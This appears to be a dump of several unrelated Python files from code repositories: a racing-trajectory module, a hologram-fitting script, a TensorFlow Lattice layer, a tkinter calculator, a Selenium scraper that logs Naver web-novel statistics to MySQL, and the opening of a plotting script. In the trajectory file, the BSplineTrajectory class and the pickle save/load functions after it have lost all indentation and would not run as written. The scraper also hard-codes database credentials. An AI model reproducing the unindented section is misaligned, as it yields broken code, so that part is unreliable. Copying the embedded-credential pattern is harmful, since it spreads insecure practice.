            _, left_bound = find_intersect(
                wp, left_poly, np.pi / 2.0, max_dist)
            _, right_bound = find_intersect(
                wp, right_poly, -np.pi / 2.0, max_dist)
            wp[Trajectory.LEFT_BOUND_X] = left_bound.x
            wp[Trajectory.LEFT_BOUND_Y] = left_bound.y
            wp[Trajectory.RIGHT_BOUND_X] = right_bound.x
            wp[Trajectory.RIGHT_BOUND_Y] = right_bound.y

        np.apply_along_axis(calc_left_right_bounds, 1, self.points)

    def fill_distance(self):
        """Fill DIST_TO_SF_BWD/FWD with cumulative arc length along the loop."""
        dists = np.zeros(len(self.points), dtype=np.float64)
        for i in range(len(self.points)):
            j = i + 1 if i < len(self.points) - 1 else 0
            dists[i] = self.distance(self.points[i, :], self.points[j, :])
        # BWD: distance travelled from the start/finish line to each point.
        self.points[0, Trajectory.DIST_TO_SF_BWD] = 0.0
        self.points[1:, Trajectory.DIST_TO_SF_BWD] = dists[:-1]
        self.points[:, Trajectory.DIST_TO_SF_BWD] = np.cumsum(
            self.points[:, Trajectory.DIST_TO_SF_BWD])
        # FWD: remaining distance to close the loop.
        track_length = np.sum(dists)
        self.points[:, Trajectory.DIST_TO_SF_FWD] = track_length - \
            self.points[:, Trajectory.DIST_TO_SF_BWD]

    def fill_time(self):
        """Fill TIME with per-segment travel durations derived from SPEED,
        assuming constant acceleration between consecutive points.

        Raises:
            Exception: if any point has both zero speed and zero longitudinal
                acceleration (the segment time would be undefined).
        """
        # Check for zero speeds.
        for pt in self.points:
            # BUG FIX: the original tested pt[Trajectory.LON_ACC == 0.0],
            # which indexes column 0 (the X coordinate) instead of comparing
            # the LON_ACC value.
            if pt[Trajectory.SPEED] == 0.0 and pt[Trajectory.LON_ACC] == 0.0:
                raise Exception(
                    "Zero speed and lon_acc encoutered. Cannot fill time.")
        self.points[0, Trajectory.TIME] = 0.0
        for i in range(len(self.points)):
            this, next = i, i + 1
            if next == len(self.points):
                next = 0
            # x = 1/2 * (v_0 + v) * t  =>  t = x / (0.5 * (v_0 + v))
            x = self.distance(self.points[this], self.points[next])
            self.points[next, Trajectory.TIME] = x / (
                0.5
                * (
                    self.points[this, Trajectory.SPEED]
                    + self.points[next, Trajectory.SPEED]
                )
            )
            # NOTE: TIME holds per-segment durations, not a cumulative clock;
            # the accumulation step was deliberately left disabled upstream.

    def fill_region(self, regions: list):
        """Stamp each waypoint's REGION column with the code of the first
        Region polygon containing it (unmatched points keep their value)."""
        polygons = []
        for region in regions:
            polygons.append((Polygon(region.vertices.tolist()), region.code))

        def p_in_p(row: np.ndarray):
            p = Point([row[Trajectory.X], row[Trajectory.Y]])
            for polygon, code in polygons:
                if polygon.contains(p):
                    row[Trajectory.REGION] = code
                    return

        np.apply_along_axis(p_in_p, 1, self.points)

    def distance(self, pt1, pt2):
        """Euclidean (x, y) distance between two waypoint rows."""
        return np.linalg.norm(pt1[Trajectory.X:Trajectory.Y+1] - pt2[Trajectory.X:Trajectory.Y+1])

    def ts(self):
        """Evenly spaced parameter values in [0, 1), one per waypoint."""
        return np.linspace(0.0, 1.0, self.__len__(), endpoint=False)

    @staticmethod
    def save(f, traj):
        """Write `traj.points` to `f` as CSV (declared @staticmethod: it is
        always invoked as Trajectory.save(...))."""
        np.savetxt(f, traj.points, delimiter=',')

    @staticmethod
    def load(f):
        """Read points written by `save` back into a new Trajectory."""
        arr = np.loadtxt(f, np.float64, delimiter=',')
        traj = Trajectory(len(arr))
        traj.points = arr
        return traj
class BSplineTrajectory:
def __init__(self, coordinates: np.ndarray, s: float, k: int):
assert coordinates.shape[0] >= 3 and coordinates.shape[1] == 2 and len(
coordinates.shape) == 2, "coordinates should be N * 2"
# close the loop
coordinates_close_loop = np.vstack(
[coordinates, coordinates[0, np.newaxis, :]])
tck, u = interpolate.splprep(
[coordinates_close_loop[:, 0], coordinates_close_loop[:, 1]], s=s, per=True, k=k)
self._spl_x = BSpline(tck[0], tck[1][0], tck[2])
self._spl_y = BSpline(tck[0], tck[1][1], tck[2])
self._length = self.__get_section_length(0.0, 1.0)
def __integrate_length(self, t: float):
return np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
def __get_section_length(self, t_min: float, t_max: float):
length, err = quad(self.__integrate_length, t_min, t_max, limit=1000)
return length
def eval_sectional_length(self, ts):
return self.__get_section_length(ts[0], ts[1])
def eval_dx_sectional_length(self, ts):
def to_integrate(t):
return interpolate.splev(t, self._spl_x, der=2) / np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
length, err = quad(to_integrate, ts[0], ts[1], limit=200)
return length
def eval_dy_sectional_length(self, ts):
def to_integrate(t):
return interpolate.splev(t, self._spl_y, der=2) / np.sqrt(interpolate.splev(t, self._spl_x, der=1) ** 2 + interpolate.splev(t, self._spl_y, der=1) ** 2)
length, err = quad(to_integrate, ts[0], ts[1], limit=200)
return length
def eval(self, t, der=0):
return interpolate.splev(t, self._spl_x, der=der), interpolate.splev(t, self._spl_y, der=der)
def __get_yaw(self, t):
return np.arctan2(interpolate.splev(t, self._spl_y, der=1), interpolate.splev(t, self._spl_x, der=1))
def __get_turn_radius(self, t):
dx = interpolate.splev(t, self._spl_x, der=1)
dy = interpolate.splev(t, self._spl_y, der=1)
d2x = interpolate.splev(t, self._spl_x, der=2)
d2y = interpolate.splev(t, self._spl_y, der=2)
curvature = np.abs(dx * d2y - dy * d2x) / \
np.sqrt((dx ** 2 + dy ** 2) ** 3)
return 1.0 / (np.abs(curvature))
def get_length(self):
return self._length
def eval_yaw(self, t):
return self.__get_yaw(t)
def sample_along(self, interval: float = None, ts=None) -> Trajectory:
if interval is not None:
total_length = self.get_length()
num_sample = int(total_length // interval)
interval = total_length / num_sample
traj = Trajectory(num_sample)
ts = np.linspace(0.0, 1.0, num_sample, endpoint=False)
else:
traj = Trajectory(len(ts))
traj[:, Trajectory.X] = interpolate.splev(ts, self._spl_x)
traj[:, Trajectory.Y] = interpolate.splev(ts, self._spl_y)
traj[:, Trajectory.YAW] = self.__get_yaw(ts)
traj[:, Trajectory.CURVATURE] = self.__get_turn_radius(ts)
for i in range(len(traj)):
if i == 0:
continue
traj[i, Trajectory.DIST_TO_SF_BWD] = traj[i-1,
Trajectory.DIST_TO_SF_BWD] + self.__get_section_length(ts[i-1], ts[i])
traj[:, Trajectory.DIST_TO_SF_FWD] = self._length - \
traj[:, Trajectory.DIST_TO_SF_BWD]
return traj
def copy(self):
return copy.deepcopy(self)
def set_control_point(self, idx, coord):
self._spl_x.c[idx] = coord[0]
self._spl_y.c[idx] = coord[1]
def get_control_point(self, idx):
return self._spl_x.c[idx], self._spl_y.c[idx]
def save(f, traj):
with open(f, "wb") as output_file:
pickle.dump(traj, output_file)
def load(f):
with open(f, "rb") as input_file:
return pickle.load(input_file)
def save_ttl(ttl_path: str, trajectory: Trajectory):
    """Write `trajectory` as a TTL file: one header line (ttl number, point
    count, total length, optional origin triple) followed by one CSV row per
    waypoint."""
    header_fields = [
        str(trajectory.ttl_num),
        str(len(trajectory)),
        str(trajectory[0, Trajectory.DIST_TO_SF_FWD]),
    ]
    if trajectory.origin is not None:
        header_fields += [str(x) for x in trajectory.origin]
    with open(ttl_path, "w") as f:
        f.write(",".join(header_fields))
        f.write("\n")
        # One CSV row per waypoint; REGION is stored as an integer.
        for row in trajectory.points:
            vals = [
                str(row[Trajectory.X]),
                str(row[Trajectory.Y]),
                str(row[Trajectory.Z]),
                str(row[Trajectory.YAW]),
                str(row[Trajectory.SPEED]),
                str(row[Trajectory.CURVATURE]),
                str(row[Trajectory.DIST_TO_SF_BWD]),
                str(row[Trajectory.DIST_TO_SF_FWD]),
                str(int(row[Trajectory.REGION])),
                str(row[Trajectory.LEFT_BOUND_X]),
                str(row[Trajectory.LEFT_BOUND_Y]),
                str(row[Trajectory.RIGHT_BOUND_X]),
                str(row[Trajectory.RIGHT_BOUND_Y]),
                str(row[Trajectory.BANK]),
                str(row[Trajectory.LON_ACC]),
                str(row[Trajectory.LAT_ACC]),
                str(row[Trajectory.TIME]),
            ]
            f.write(','.join(vals) + '\n')
def load_ttl(ttl_path: str) -> Trajectory:
    """Read a TTL file written by save_ttl back into a Trajectory (header
    must contain at least the ttl number, count, length and origin triple)."""
    with open(ttl_path, "r") as f:
        header = f.readline().split(",")
    assert len(header) >= 6
    data = np.loadtxt(ttl_path, dtype=float, delimiter=",", skiprows=1)
    origin = (float(header[3]), float(header[4]), float(header[5]))
    trajectory = Trajectory(len(data), int(header[0]), origin)
    # Rows may carry fewer than 19 columns; the rest stay zero.
    trajectory.points[:, :data.shape[1]] = data
    return trajectory
| HaoruXue/spline-trajectory-optimization | spline_traj_optm/models/trajectory.py | trajectory.py | py | 13,395 | python | en | code | 1 | github-code | 90 |
1301144606 | from CNNLorenzMie.crop_feature import crop_feature
import cv2, json
from matplotlib import pyplot as plt
import numpy as np
from lmfit import report_fit
from time import time
import os
# Refine the ML hologram predictions: crop each predicted feature out of its
# frame, run a Lorenz-Mie fit on it, and dump the fitted parameters to JSON.
with open('your_MLpreds.json', 'r') as f:
    MLpreds = json.load(f)
savedict = []
path = os.getcwd()+'/norm_images'
# NOTE(review): `f` here shadows the file handle name used above/below.
numimgs = len([f for f in os.listdir(path)if os.path.isfile(os.path.join(path, f))])
savedict = []  # NOTE(review): duplicate re-initialization (also set above)
#just do one at a time for now
for i in range(numimgs):
    filepath = path + '/image' + str(i).zfill(4) + '.png'
    localim = cv2.imread(filepath)
    # Predictions belonging to this frame only.
    localpreds = [x for x in MLpreds if x['framenum']==i]
    #reformat for cropping
    for pred in localpreds:
        print(pred)
        localxy = {"conf":1}
        x_p = pred['x_p']
        y_p = pred['y_p']
        ext = pred['shape']
        # Square bounding box centered on the predicted particle position.
        localxy["bbox"] = [x_p, y_p, ext, ext]
        features,_,_ = crop_feature(img_list = [localim], xy_preds = [[localxy]])
        #instatiates a feature, puts in data, coords, x_p, y_p
        if len(features[0]) != 1:
            print('Something went wrong')
            print(len(features[0]))
        feature = features[0][0]
        feature.deserialize(pred) #puts in rest of feature info
        start = time()
        result = feature.optimize(method='amoeba-lm')
        print("Time to fit: {:03f}".format(time() - start))
        print(result)
        # Keep the fitted parameters plus provenance; drop the raw pixel data.
        localdict = feature.serialize(exclude=['data'])
        localdict['framenum'] = i
        localdict['framepath'] = os.path.abspath(filepath)
        localdict['redchi'] = result.redchi
        savedict.append(localdict)
    print('Completed frame {}'.format(i))
with open('your_refined.json', 'w') as f:
    json.dump(savedict, f)
print('Saved fits')
| laltman2/CNNLorenzMie | experiments/refine.py | refine.py | py | 1,717 | python | en | code | 6 | github-code | 90 |
17437488970 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow import keras
class Aggregation(keras.layers.Layer):
  # pyformat: disable
  """Layer which represents an aggregation function.

  Calls the model on each of the ragged dimensions and takes the mean.

  Input shape:
  A list or dictionary with num_input_dims Rank-2 ragged tensors with
  shape: (batch_size, ?)

  Output shape:
  Rank-2 tensor with shape: (batch_size, 1)

  Attributes:
    - All `__init__ `arguments.

  Example:

  ```python
  model = tf.keras.Model(inputs=inputs, outputs=outputs)
  layer = tfl.layers.Aggregation(model)
  ```
  """
  # pyformat: enable

  def __init__(self, model, **kwargs):
    """initializes an instance of `Aggregation`.

    Args:
      model: A tf.keras.Model instance.
      **kwargs: Other args passed to `tf.keras.layers.Layer` initializer.

    Raises:
      ValueError: if model is not at `tf.keras.Model` instance.
    """
    if not isinstance(model, tf.keras.Model):
      raise ValueError('Model must be a tf.keras.Model instance.')
    super(Aggregation, self).__init__(**kwargs)
    # This flag enables inputs to be Ragged Tensors
    self._supports_ragged_inputs = True
    self.model = model

  def call(self, x):
    """Standard Keras call() method."""
    # Apply the wrapped model to every ragged element, then average over
    # the ragged (per-example) dimension to get one value per batch row.
    return tf.reduce_mean(tf.ragged.map_flat_values(self.model, x), axis=1)

  def get_config(self):
    """Standard Keras get_config() method."""
    config = super(Aggregation, self).get_config().copy()
    # The wrapped model is serialized alongside the layer's own config.
    config.update(
        {'model': tf.keras.utils.legacy.serialize_keras_object(self.model)}
    )
    return config

  @classmethod
  def from_config(cls, config, custom_objects=None):
    # Rebuild the wrapped model first, then the layer around it.
    model = tf.keras.utils.legacy.deserialize_keras_object(
        config.pop('model'), custom_objects=custom_objects
    )
    return cls(model, **config)
| tensorflow/lattice | tensorflow_lattice/python/aggregation_layer.py | aggregation_layer.py | py | 1,912 | python | en | code | 515 | github-code | 90 |
39338352547 | import tkinter as tk
from tkinter import *
# declares a global variable
expression = ""
# functions for numbers, equal, and clearing out
# function for numbers
def btn_click(item):
    """Append the pressed button's symbol to the running expression and
    refresh the calculator display."""
    global expression
    expression += str(item)
    input_text.set(expression)
# this clears the input field
def clear():
    """Reset the running expression and blank the display (AC button)."""
    global expression
    expression = ""
    input_text.set(expression)
# the equal button
def equal():
    """Evaluate the accumulated expression and show the result (= button).

    Invalid expressions (e.g. "5*/2") or division by zero display "Error"
    instead of crashing the UI, and the expression buffer is reset either way.
    """
    global expression
    try:
        # NOTE: eval() executes arbitrary Python; acceptable here only
        # because the input comes from the calculator's own buttons.
        result = str(eval(expression))
        input_text.set(result)
    except (SyntaxError, ZeroDivisionError):
        input_text.set("Error")
    expression = ""
# designing UI of the calculator
# Build the fixed-size calculator window: a display entry on top, then five
# rows of buttons packed into successive `top` frames.
ui = Tk()
# title
ui.title("Calculator")
# size
ui.geometry("450x750")
# prevents it from being resized
ui.resizable(False, False)
# background color of the calculator
ui.config(bg="Black")
# import StringVar() from tkinter, or use tk.StringVar()
# StringVar() holds string data - used for widgets like entry
input_text = StringVar()
# a box for the top half to display number selected
# NOTE(review): `display` is first the Frame and is then rebound to the
# Entry created inside it two statements below.
display = tk.Frame(ui, width=312, height=50, bg="Black", highlightbackground="Black", highlightcolor="Black",
                   highlightthickness=1)
display.pack(side="top")
# input field inside the frame
display = tk.Entry(display, font=('arial', 30), textvariable=input_text, width=30, bg="black", fg="white", bd=0,
                   justify='right',)
# NOTE(review): grid() and pack() are both called on the same Entry --
# mixing geometry managers in one container is normally an error; confirm.
display.grid(row=0, column=0)
display.pack(padx=50, pady=75)
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# buttons for each different functions + numbers
# lambda = used to define an anonymous functions in python
# Row 1: AC, negate, modulo, divide.
all_clear = tk.Button(ui, text="AC", bg="grey", width=10, height=5, command=lambda: clear())
all_clear.pack(padx=5, pady=5, in_=top, side='left')
neg_button = tk.Button(ui, text="-", bg="grey", width=10, height=5, command=lambda: btn_click("-"))
neg_button.pack(padx=5, pady=5, in_=top, side='left')
mod_button = tk.Button(ui, text="%", bg="grey", width=10, height=5, command=lambda: btn_click("%"))
mod_button.pack(padx=5, pady=5, in_=top, side='left')
division_button = tk.Button(ui, text="/", bg="orange", width=10, height=5, command=lambda: btn_click("/"))
division_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
# `top` is rebound to a fresh frame for each button row.
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# Row 2: 7, 8, 9, multiply.
seven = tk.Button(ui, text="7", bg="grey", width=10, height=5, command=lambda: btn_click("7"))
seven.pack(padx=5, pady=5, in_=top, side='left')
eight = tk.Button(ui, text="8", bg="grey", width=10, height=5, command=lambda: btn_click("8"))
eight.pack(padx=5, pady=5, in_=top, side='left')
nine = tk.Button(ui, text="9", bg="grey", width=10, height=5, command=lambda: btn_click("9"))
nine.pack(padx=5, pady=5, in_=top, side='left')
multi_button = tk.Button(ui, text="x", bg="orange", width=10, height=5, command=lambda: btn_click("*"))
multi_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# Row 3: 4, 5, 6, subtract.
four = tk.Button(ui, text="4", bg="grey", width=10, height=5, command=lambda: btn_click("4"))
four.pack(padx=5, pady=5, in_=top, side='left')
five = tk.Button(ui, text="5", bg="grey", width=10, height=5, command=lambda: btn_click("5"))
five.pack(padx=5, pady=5, in_=top, side='left')
six = tk.Button(ui, text="6", bg="grey", width=10, height=5, command=lambda: btn_click("6"))
six.pack(padx=5, pady=5, in_=top, side='left')
sub_button = tk.Button(ui, text="-", bg="orange", width=10, height=5, command=lambda: btn_click("-"))
sub_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# Row 4: 1, 2, 3, add.
one = tk.Button(ui, text="1", bg="grey", width=10, height=5, command=lambda: btn_click("1"))
one.pack(padx=5, pady=5, in_=top, side='left')
two = tk.Button(ui, text="2", bg="grey", width=10, height=5, command=lambda: btn_click("2"))
two.pack(padx=5, pady=5, in_=top, side='left')
three = tk.Button(ui, text="3", bg="grey", width=10, height=5, command=lambda: btn_click("3"))
three.pack(padx=5, pady=5, in_=top, side='left')
add_button = tk.Button(ui, text="+", bg="orange", width=10, height=5, command=lambda: btn_click("+"))
add_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# Row 5: wide 0, decimal point, equals.
zero = tk.Button(ui, text="0", bg="grey", width=23, height=5, command=lambda: btn_click("0"))
zero.pack(padx=5, pady=5, in_=top, side='left')
period = tk.Button(ui, text=".", bg="grey", width=10, height=5, command=lambda: btn_click("."))
period.pack(padx=5, pady=5, in_=top, side='left')
equals_button = tk.Button(ui, text="=", bg="orange", width=10, height=5, command=lambda: equal())
equals_button.pack(padx=5, pady=5, in_=top, side='left')
# this runs the UI
ui.mainloop()
| notdien/GUI-calculator | main.py | main.py | py | 4,936 | python | en | code | 0 | github-code | 90 |
44212597724 | import re
import requests
import random
import time
import pickle
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from bs4 import BeautifulSoup
from gtts import gTTS
import vlc
from mutagen.mp3 import MP3
import pymysql
import datetime
# DB 생성정보
# create user cho@localhost identified by 'Qwer1234!';
# create user cho@'%' identified by 'Qwer1234!';
# create database cho_db default character set utf8;
# grant all privileges on cho_db.* to 'cho'@'%'
# ####grant all privileges on cho_db.* to 'cho'@'%' identified by 'Qwer1234!';
# DROP TABLE spesial_interview_stat_tb;
# CREATE TABLE `spesial_interview_stat_tb`(
# `num` BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
# `create_date` DATETIME,
# `subject` VARCHAR(128) NOT NULL,
# `score_average` NUMERIC,
# `score_count` NUMERIC,
# `heart_count` NUMERIC,
# `comment_count` NUMERIC,
# `view_count` NUMERIC
# ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
# ALTER TABLE spesial_interview_stat_tb ADD INDEX IDX_s_i_tb_1(create_date ASC);
# ALTER TABLE spesial_interview_stat_tb ADD INDEX IDX_s_i_tb_2(subject ASC);
# Module-level shared state used by the scraper functions below.
# NOTE(review): `global` statements at module scope are no-ops in Python;
# these lines only document which names the functions treat as globals.
global mydb
global mycursor
global browser
global view_count_list
global currdate
global novel_url_list
global onlyWrite
def connect_stat_db():
    """Open the global MySQL connection/cursor used for stat inserts."""
    global mydb
    global mycursor
    # NOTE(review): credentials are hard-coded; consider moving them to
    # a config file or environment variables.
    mydb = pymysql.connect( host='127.0.0.1', port=5909, user='cho', passwd='Qwer1234!',db='cho_db', charset='utf8')
    mycursor = mydb.cursor()
def disconnect_stat_db():
    """Close the global cursor and connection opened by connect_stat_db()."""
    mycursor.close()
    mydb.close()
def init_webdriver():
    """Start a headless Chrome webdriver and store it in the global `browser`."""
    global browser
    options = webdriver.ChromeOptions()
    # Headless with a fixed window size and a desktop user agent so the site
    # serves the normal desktop markup.
    options.headless = True
    options.add_argument("window-size=1920x1080")
    options.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
    browser = webdriver.Chrome(options=options)
    browser.implicitly_wait(1)  # default element-lookup wait, in seconds
def clear_webdriver():
    """Quit the global Chrome webdriver and release its resources."""
    global browser
    browser.quit()
def scrape_special_interview_view_count():
    """Walk every list page of the series and collect, in episode order,
    each episode's view count (into `view_count_list`) and its absolute
    URL (into `novel_url_list`)."""
    global browser
    global view_count_list
    global novel_url_list
    novel_url_list=[]
    view_count_list=[]
    base_url = "https://novel.naver.com/challenge/list?novelId=1042098&order=Oldest&page="
    # Change here when the series start URL changes.
    page_index=0
    novel_index_offset=0
    while True:
        page_index+=1
        url = base_url + str(page_index)
        browser.get(url) # navigate to the list page
        time.sleep(1)
        soup = BeautifulSoup(browser.page_source, "lxml")
        novel_list_elements = soup.find("ul", attrs={"class":"list_type2 v3 league_num NE=a:lst"}).find_all("li", attrs={"class":"volumeComment"})
        for novel_list_element in novel_list_elements:
            # The second "count" span holds views; strip thousands separators
            # and expand the Korean 만 (x10,000) suffix into four zeros.
            # NOTE(review): a value like "1.2만" becomes "1.20000" -- verify
            # the site never renders fractional 만 counts.
            view_count=novel_list_element.find_all("span", attrs={"class":"count"})[1].get_text().split(' ')[1].replace(',','').replace('만','0000')
            view_count_list.append(view_count)
            novel_url=novel_list_element.find("a", attrs={"class":"list_item NPI=a:list"})["href"]
            novel_url_list.append("https://novel.naver.com"+novel_url)
        try:
            # Stop when there is no link to the next page number.
            nest_page_index=soup.find("div", attrs={"class":"paging NE=a:lst"}).find("a", text=str(page_index+1))
        except Exception as err: # paging block missing entirely (single page)
            break
        if not nest_page_index:
            break
def insert_change_stat_info(stat_in_db):
    """Insert one episode's scraped stats as a new row of
    spesial_interview_stat_tb, timestamped with the global `currdate`.

    stat_in_db: [subject, score_average, score_count, heart_count,
    view_count], all strings as scraped from the page.
    """
    global mydb
    global mycursor
    global currdate
    # Normalize the subject down to "<episode number>화".
    simple_subject = stat_in_db[0].split('화')
    subject_db = simple_subject[0]+"화"
    score_average_db=float(stat_in_db[1].strip())
    score_count_db=int(stat_in_db[2].replace("명","").strip())  # strip "명" (people) suffix
    heart_count_db=int(stat_in_db[3])
    view_count_db=int(stat_in_db[4])
    # Parameterized INSERT; values are bound by pymysql, not interpolated.
    sql = "INSERT INTO spesial_interview_stat_tb \
        (create_date, subject, score_average, score_count, heart_count, view_count) \
        VALUES (%s, %s, %s, %s, %s, %s)"
    val = (currdate, subject_db, score_average_db, score_count_db, heart_count_db, view_count_db)
    mycursor.execute(sql, val)
    mydb.commit()
def text_to_speech(input_text):
    """Synthesize `input_text` to Korean speech and play it, blocking until done.

    The audio is rendered to a scratch file 'inputtext.mp3' via gTTS, then
    played with VLC.  MediaPlayer.play() returns immediately, so we read the
    clip length with mutagen and sleep for that long to block until playback
    finishes.
    """
    # Removed an unused local (`checkval = len(input_text)`) left over from
    # earlier debugging.
    gSound = gTTS( input_text, lang='ko', slow=False)
    gSound.save('inputtext.mp3')
    media_player = vlc.MediaPlayer()
    media=vlc.Media('inputtext.mp3')
    audio = MP3("inputtext.mp3")
    play_time = audio.info.length  # clip duration in seconds
    media_player.set_media(media)
    media_player.play()
    time.sleep(play_time)  # block until playback ends
def check_change_info(old_total, new_total):
    """Compare an episode's previous vs. current stats and announce changes.

    old_total/new_total: [subject, score_average, score_count, heart_count,
    view_count, comment_info] where comment_info is [nick_list, id_list,
    comment_list].  Builds a Korean voice message describing every metric
    that changed plus any newly found comments, prints it and speaks it via
    text_to_speech().
    """
    change_info_flag=False
    voice_notice=""
    subject_db = ""
    score_average_db = score_count_db = heart_count_db = comment_count_db = view_count_db = 0
    simple_subject = old_total[0].split('화')
    subject_db = simple_subject[0]+"화"
    voice_notice = "{0}화. ".format( simple_subject[0])
    # Per-metric deltas: a metric is reported only when its raw scraped
    # string differs between the two snapshots.
    if old_total[1] != new_total[1]:
        score_average_db = round( float(new_total[1].strip()) - float(old_total[1].strip()), 3)
        voice_notice += ", 평점 {0} 추가, " .format( score_average_db )
        change_info_flag = True
    if old_total[2] != new_total[2]:
        score_count_db = int(new_total[2].replace("명","").strip()) - int(old_total[2].replace("명","").strip())
        voice_notice += ", 별점참여 {0} 추가, " .format( score_count_db )
        change_info_flag = True
    if old_total[3] != new_total[3]:
        heart_count_db = int(new_total[3].strip()) - int(old_total[3].strip())
        voice_notice += ", 하트 {0} 추가, " .format( heart_count_db )
        change_info_flag = True
    if old_total[4] != new_total[4]:
        view_count_db = int(new_total[4].strip()) - int(old_total[4].strip())
        voice_notice += ", 조회수 {0} 추가, " .format( view_count_db )
        change_info_flag = True
    # Comment diff: a comment counts as new unless the same nick posted the
    # same text in the old snapshot.  An IndexError while reading the comment
    # body means the body was removed (apparently by the Clean Bot filter).
    old_comment_list = old_total[5]
    new_comment_list = new_total[5]
    old_comment_list_cnt=len(old_comment_list[0])
    new_comment_list_cnt=len(new_comment_list[0])
    comment_count_db = 0
    if new_comment_list_cnt > 0:
        loop_comment_index=range(0,new_comment_list_cnt)
        for new_comment_index in loop_comment_index:
            if old_comment_list_cnt > 0:
                continue_boolean=False
                for old_comment_index in range(0,old_comment_list_cnt):
                    if old_comment_list[0][old_comment_index] == new_comment_list[0][new_comment_index]:
                        try:
                            if old_comment_list[2][old_comment_index] == new_comment_list[2][new_comment_index]:
                                continue_boolean=True
                                break
                        except IndexError:
                            continue_boolean=True
                            continue
                if continue_boolean:
                    continue
            try:
                voice_notice+="추가 {0}님의 댓글, {1}" .format( new_comment_list[0][new_comment_index], new_comment_list[2][new_comment_index] )
                change_info_flag = True
                comment_count_db+=1
            except IndexError:
                voice_notice+="추가 {0}님의 댓글, 클린봇으로 삭제되었습니다." .format( new_comment_list[0][new_comment_index])
                change_info_flag = True
                comment_count_db+=1
    # NOTE(review): comment_count_db is tallied but never persisted/returned.
    if( change_info_flag ):
        print(voice_notice)
        text_to_speech(voice_notice)
def scrape_special_interview():
    """Visit each episode URL collected earlier, scrape its stats and
    comments, store them in the DB, and announce diffs against the pickled
    previous snapshot.  Stops after the newest episode and re-pickles the
    fresh snapshot."""
    global browser
    global view_count_list
    global onlyWrite
    onlyWrite=0  # 0 = also diff against the old snapshot; nonzero = write-only
    print("[그와의 은밀한 면접]")
    # starturl = "https://novel.naver.com/best/list?novelId=1019899"
    starturl = "https://novel.naver.com/challenge/list?novelId=1042098"
    # Title of the most recent episode: used as the stop marker below.
    browser.get(starturl) # navigate to the start url
    soup = BeautifulSoup(browser.page_source, "lxml")
    subject_list = soup.find("ul", attrs={"class":"list_type2 v3 league_num NE=a:lst"}).find_all("li",attrs={"class":"volumeComment"})
    stop_subject = subject_list[0].find("p", attrs={"class":"subj"}).get_text().strip()
    stop_subject = stop_subject[:stop_subject.find('\n')]
    if not onlyWrite:
        with open('C:/PythonWorkSpace/spesial_interview/spesial_interview_old.pickle', 'rb') as rf:
            old_total_info = pickle.load(rf)
    total_info=[] # accumulates per-episode info for the new snapshot
    check_index = 0 # index into novel_url_list / view_count_list
    while True:
        try:
            browser.get(novel_url_list[check_index])
            time.sleep(3)
            subject = browser.find_element(By.XPATH, "//*[@id='content']/div[1]/div[2]/h2").text
            subject = subject[:subject.find('\n')]
            score_average = browser.find_element(By.XPATH, "//*[@id='currentStarScore']").text
            score_count = browser.find_element(By.XPATH, "//*[@id='currentStarScoreCount']").text
            temp_heart_count = browser.find_element(By.XPATH, "//*[@id='content']/div[1]/div[3]/div[2]/div[1]/a/em").text
            if temp_heart_count == '좋아요': # element shows the label when there are no likes yet
                heart_count = '0'
            else:
                heart_count = temp_heart_count
            view_count = view_count_list[check_index]
            browser.switch_to.frame('nCommentIframe') # enter the comment iframe
            nick_list = [nick.text for nick in browser.find_elements(By.CLASS_NAME,"u_cbox_nick")]
            id_list = [id.text for id in browser.find_elements(By.CLASS_NAME,"u_cbox_id")]
            comment_list = [content.text for content in browser.find_elements(By.CLASS_NAME,"u_cbox_contents")]
            comment_info = [nick_list, id_list, comment_list]
            browser.switch_to.default_content() # leave the comment iframe
            insert_change_stat_info([subject, score_average, score_count, heart_count, view_count])
            # Gather everything about this episode into one record.
            single_info=[subject, score_average, score_count, heart_count, view_count, comment_info]
            total_info.append(single_info)
            if not onlyWrite:
                if check_index < len(old_total_info):
                    check_change_info(old_total_info[check_index], single_info)
                else:
                    print(subject, "는 신규 작품이므로 이후부터 체크됩니다.")
            check_index = check_index + 1
            if stop_subject == subject:
                print('마지막화 입니다. 종료합니다.')
                with open('C:/PythonWorkSpace/spesial_interview/spesial_interview_old.pickle', 'wb') as fw:
                    pickle.dump(total_info, fw)
                break
        except Exception as err:
            # Any scraping failure aborts the pass; next loop iteration in
            # __main__ retries from scratch.
            print(err)
            break
if __name__ == "__main__":
connect_stat_db()
try:
while True:
now = datetime.datetime.now()
currdate = now.strftime('%Y-%m-%d %H:%M:%S')
init_webdriver()
scrape_special_interview_view_count()
scrape_special_interview()
clear_webdriver()
voice_notice='''전 작품 체크가 끝났습니다.'''
print(voice_notice)
time.sleep(300)
except Exception as err:
print(err)
disconnect_stat_db()
| linux1218/spesial_interview | project_web_scraping/spesial_interview_new.py | spesial_interview_new.py | py | 11,855 | python | en | code | 0 | github-code | 90 |
24745471077 | import pickle
import matplotlib.pyplot as plt
import sys, os
import numpy as np
import FormPars
if len(sys.argv) < 2:
    # Print usage and bail out when no pickle file was given.
    print('========== Syntax ===========')
    print('python PlotBurnIn.py')
    print('<mcmc pickle file>')
    print('<path to figure directory (optional)>')
    exit()
sPathToPickleMCMC = os.path.abspath(sys.argv[1])
if len(sys.argv) > 2:
    sPathToSaveDir = sys.argv[2]
else:
